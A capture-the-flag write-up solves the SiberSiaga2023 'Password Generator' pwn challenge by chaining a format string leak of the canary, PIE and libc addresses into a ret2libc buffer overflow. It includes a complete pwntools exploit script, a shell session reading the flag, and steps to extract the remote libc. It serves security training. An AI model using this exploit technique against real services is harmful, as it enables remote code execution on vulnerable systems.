Generate strong & secure passwords for all your online accounts with our random password generator.
TL;DR
Abuse Format String Vulnerability to leak canary, LIBC and PIE addresses, then ret2libc.
Challenge Overview
This is a continuation of Backdoor or Frontdoor? challenge from the qualifier round. Similarly, running the binary prompts the user for a name, which is echoed back to us. Then, it asks for the password length instead of the actual password.
Preliminary checks on the binary protection shows that NX is enabled, leaving us with a ROP-based attack. Since canary is also in place, we need a READ PRIMITIVE to leak it and overwrite it back in order to keep it intact.
┌──(kali💀JesusCries)-[~/…/SiberSiaga2023 (Finals)/Pwn/Password Generator/bin]
└─$ checksec --file=main
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH 84 Symbols No
With PIE enabled, the base address for the binary, as well as any ROP Gadgets will be randomized each time we execute it. This can be verified by checking the LIBC import address on different runtime instances.
Format String Vulnerability - In Line 13, printf() is used to print our user-controlled input without a format specifier. Using this, it provides us a READ PRIMITIVE to defeat canary and PIE.
Buffer Overflow - In Line 15, fgets() is used to allocate a large number of characters, exceeding the size of the destination buffer. This is where we can control the EIP and construct a ROP Chain.
Also, note that the canary check is performed at Line 18. Since our canary local_10 is situated just below our buffer local_38, any Buffer Overflow attempt will trigger the binary to terminate immediately.
undefined8 convert(void)
{
int iVar1;
long in_FS_OFFSET;
char local_38 [40];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
printf("Enter name : ");
fgets(local_38,0x2a,stdin);
puts("Hello Mr/Ms");
printf(local_38,0x2a);
printf("Enter length of the password = ");
fgets(local_38,0x100,stdin);
iVar1 = atoi(local_38);
password(iVar1);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
__stack_chk_fail();
}
return 0;
}
Exploit
Format String Vulnerability
To leak addresses out from the stack, we can use the %p specifier. We can use this in our advantage to leak all LIBC, PIE and canary addresses at different offset of the stack. However, due to the size limitation of our input, we can only leak so much data before the binary is terminated due to stack smashing.
Instead of sending consecutive %p in a row, we can fuzz each offset separately with %1$p until %99$p to defeat the size limitation.
┌──(kali💀JesusCries)-[~/…/SiberSiaga2023 (Finals)/Pwn/Password Generator/bin]
└─$ ./main
Enter name : %3$p %5$p %7$p %9$p
Hello Mr/Ms
0x7f2ded18b0e0 (nil) 0x2520702437252070 0x7ffe3c4978b8
Addresses that ends with the same 3 bytes after executing the fuzzing script iteratively are our point of interest. We can determine these addresses by following the general Rule of Thumb:
Offset 3: LIBC address usually starts with 0x7f
Offset 11: Canary address are very random, and usually ends with 00 as it's trailing bytes
Offset 13: PIE address usually starts with 0x5
Calculating Offset
Each time we execute the binary, the address at the 3rd offset that we leak will be different due to ASLR, along with the base address of LIBC, however, the leaked address will always be 0xf80e0 bytes away from the base of LIBC. With the knowledge of this offset value, we have just defeated ASLR!
As a Proof-of-Concept, we will attempt to rewrite the canary back with the leaked value, then redirect EIP back to the main function, so we get to see the challenge banner for a second time.
┌──(kali💀JesusCries)-[~/…/SiberSiaga2023 (Finals)/Pwn/Password Generator/bin]
└─$ ./solve.py
[+] Starting local process './main': pid 79273
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for './main'
[DEBUG] Received 0x337 bytes:
b' ,---------------------------,\n'
b' | /--------------------- |\n'
b' | | | |\n'
b' | | Pwn Challenge | |\n'
b' | | passwd generator | |\n'
b' | | SiberSiaga23 | |\n'
b' | | | |\n'
b' | | | |\n'
b' | _____________________ / |\n'
b' |___________________________|\n'
b' ,---_____ [] _______/------,\n'
b' / /______________ /|\n'
b'/___________________________________ / | ___\n'
b'| | | )\n'
b'| _ _ _ [-------] | | (\n'
b'| o o o [-------] | / _)_\n'
b'|__________________________________ |/ / /\n'
b'/-------------------------------------/| ( )/\n'
b'/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /\n'
b'/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /\n'
b'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
b'Enter name : '
[DEBUG] Sent 0x16 bytes:
b'%13$lx::%11$lx::%3$lx\n'
[DEBUG] Received 0x58 bytes:
b'Hello Mr/Ms\n'
b'559f68e00ef4::e142181957ab4700::7f360e8b80e0\n'
b'Enter length of the password = '
[*] Pie: 0x559f68e00000
[*] Canary: 0xe142181957ab4700
[*] LIBC: 0x7f360e7c0000
[*] Loaded 195 cached gadgets for '/lib/x86_64-linux-gnu/libc.so.6'
[DEBUG] Sent 0x41 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000020 41 41 41 41 41 41 41 41 00 47 ab 57 19 18 42 e1 │AAAA│AAAA│·G·W│··B·│
00000030 41 41 41 41 41 41 41 41 bd 0e e0 68 9f 55 00 00 │AAAA│AAAA│···h│·U··│
00000040 0a │·│
00000041
[*] Switching to interactive mode
[DEBUG] Received 0x331 bytes:
b' ,---------------------------,\n'
b' | /--------------------- |\n'
b' | | | |\n'
b' | | Pwn Challenge | |\n'
b' | | passwd generator | |\n'
b' | | SiberSiaga23 | |\n'
b' | | | |\n'
b' | | | |\n'
b' | _____________________ / |\n'
b' |___________________________|\n'
b' ,---_____ [] _______/------,\n'
b' / /______________ /|\n'
b'/___________________________________ / | ___\n'
b'| | | )\n'
b'| _ _ _ [-------] | | (\n'
b'| o o o [-------] | / _)_\n'
b'|__________________________________ |/ / /\n'
b'/-------------------------------------/| ( )/\n'
b'/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /\n'
b'/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ /\n'
b'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
[*] Got EOF while reading in interactive
Solution
Local
To receive an interactive shell, instead of returning to main, we can construct a ROP chain to perform a ret2libc attack.
Local Solve Script
solve.py
#!/usr/bin/python3
from pwn import *
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
piebase
'''.format(**locals())
# Binary filename
exe = './main'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# libc leak at 3
# pie leak at 13 or 19
# canary leak at 11 or 35
# Start program
io = start()
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
rop = ROP(elf)
io.recvuntil(b"name : ")
io.sendline(b'%13$lx::%11$lx::%3$lx')
io.recvuntil(b'Mr/Ms\n')
leak = io.recvline()
pie = int(leak.strip().split(b'::')[0], 16) - 0xef4
canary = int(leak.strip().split(b'::')[1], 16)
libc.address = int(leak.strip().split(b'::')[2], 16) - 0xf80e0
log.info("Pie: %s" % hex(pie))
log.info("Canary: %s" % hex(canary))
log.info("LIBC: %s" % hex(libc.address))
rop = ROP(libc)
pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
ret = (rop.find_gadget(['ret']))[0]
payload = flat([
40 * b'A',
canary,
8 * b'A',
pop_rdi,
next(libc.search(b'/bin/sh')),
ret,
libc.sym['system'],
])
io.sendlineafter(b"password = ", payload)
io.interactive()
┌──(kali💀JesusCries)-[~/…/SiberSiaga2023 (Finals)/Pwn/Password Generator/bin]
└─$ ./solve.py
[+] Starting local process './main': pid 25273
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for './main'
[DEBUG] Received 0x337 bytes:
b'Enter name : '
[DEBUG] Sent 0x16 bytes:
b'%13$lx::%11$lx::%3$lx\n'
[DEBUG] Received 0x58 bytes:
b'Hello Mr/Ms\n'
b'557b06000ef4::33ce426719431c00::7f2d88b2f0e0\n'
b'Enter length of the password = '
[*] Pie: 0x557b06000000
[*] Canary: 0x33ce426719431c00
[*] LIBC: 0x7f2d88a37000
[*] Loaded 195 cached gadgets for '/lib/x86_64-linux-gnu/libc.so.6'
[DEBUG] Sent 0x59 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000020 41 41 41 41 41 41 41 41 00 1c 43 19 67 42 ce 33 │AAAA│AAAA│··C·│gB·3│
00000030 41 41 41 41 41 41 41 41 25 e7 a5 88 2d 7f 00 00 │AAAA│AAAA│%···│-···│
00000040 31 d0 bc 88 2d 7f 00 00 c2 e0 a5 88 2d 7f 00 00 │1···│-···│····│-···│
00000050 30 33 a8 88 2d 7f 00 00 0a │03··│-···│·│
00000059
[*] Switching to interactive mode
[DEBUG] Received 0x7 bytes:
b'\n'
b'\t\n'
b'\t\n'
b'\t\n'
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x24 bytes:
b'core flag fuzz.py main solve.py\n'
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x170 bytes:
b' _ _.--.____.--._\n'
b'( )=.-":;:;:;;\':;:;:;"-._\n'
b' \\\\\\:;:;:;:;:;;:;::;:;:;:\\\n'
b' \\\\\\:;:;:;:;:;;:;:;:;:;:;\\\n'
b' \\\\\\:;::;:;:;:;:;::;:;:;:\\\n'
b' \\\\\\:;:;:;:;:;;:;::;:;:;:\\\n'
b' \\\\\\:;::;:;:;:;:;::;:;:;:\\\n'
b' \\\\\\;;:;:_:--:_:_:--:_;:;\\\n'
b' \\\\\\_.-" "-._\\\n'
b' \\\\\n'
b' \\\\\n'
b' \\\\\n'
b' \\\\\n'
b' \\\\\n'
b' \\\\\n'
b'\n'
b'SIBERSIAGA23{this_is_a_flag}\n'
Remote
Typically for a remote instance, the LIBC version in used will vary based on the setup, which leads to the need of recalculating the offset. As the docker files were provided, we can build the image and extract the LIBC in use.
┌──(kali💀JesusCries)-[~/Desktop/Password Generator]
└─$ ls
bin ctf.xinetd Dockerfile start.sh
┌──(kali💀JesusCries)-[~/Desktop/Password Generator]
└─$ sudo docker build -t siber .
[+] Building 13.1s (18/18) FINISHED
┌──(kali💀JesusCries)-[~/Desktop/Password Generator]
└─$ sudo docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE
siber latest 06b1b8e932c3 9 minutes ago 997MB
┌──(kali💀JesusCries)-[~/Desktop/Password Generator/bin]
└─$ sudo docker run -it --rm --name passgen --entrypoint sh siber
# ldd main
linux-vdso.so.1 (0x00007ffd23f84000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3dfe8fb000)
/lib64/ld-linux-x86-64.so.2 (0x00007f3dfeeef000)
# readlink -f /lib/x86_64-linux-gnu/libc.so.6
/lib/x86_64-linux-gnu/libc-2.27.so
┌──(kali💀JesusCries)-[~/Desktop/Password Generator]
└─$ sudo docker create siber
41e5e5c13a9e975bdedc32b58ec7dab2ecea81c07b6fbe1350eda61910d0db6d
┌──(kali💀JesusCries)-[~/Desktop/Password Generator/bin]
└─$ sudo docker cp 41e5e5c13a9e975bdedc32b58ec7dab2ecea81c07b6fbe1350eda61910d0db6d:/lib/x86_64-linux-gnu/libc-2.27.so ~/Desktop/libc-2.27.so
Successfully copied 2.03MB to /home/kali/Desktop/libc-2.27.so
Now use pwninit to patch the binary, so that it uses the exact LIBC file we carved from the remote instance.
┌──(kali💀JesusCries)-[~/Desktop/Password Generator/bin]
└─$ ls
flag libc-2.27.so main
┌──(kali💀JesusCries)-[~/Desktop/Password Generator/bin]
└─$ pwninit
bin: ./main
libc: ./libc-2.27.so
fetching linker
https://launchpad.net/ubuntu/+archive/primary/+files//libc6_2.27-3ubuntu1.6_amd64.deb
unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.27-3ubuntu1.6_amd64.deb
warning: failed unstripping libc: failed running eu-unstrip, please install elfutils: No such file or directory (os error 2)
setting ./ld-2.27.so executable
symlinking ./libc.so.6 -> libc-2.27.so
copying ./main to ./main_patched
running patchelf on ./main_patched
writing solve.py stub
┌──(kali💀JesusCries)-[~/Desktop/Password Generator/bin]
└─$ ls
flag ld-2.27.so libc-2.27.so libc.so.6 main main_patched solve.py
Recalculate the LIBC offset by repeating the steps above. We now have a different offset value.
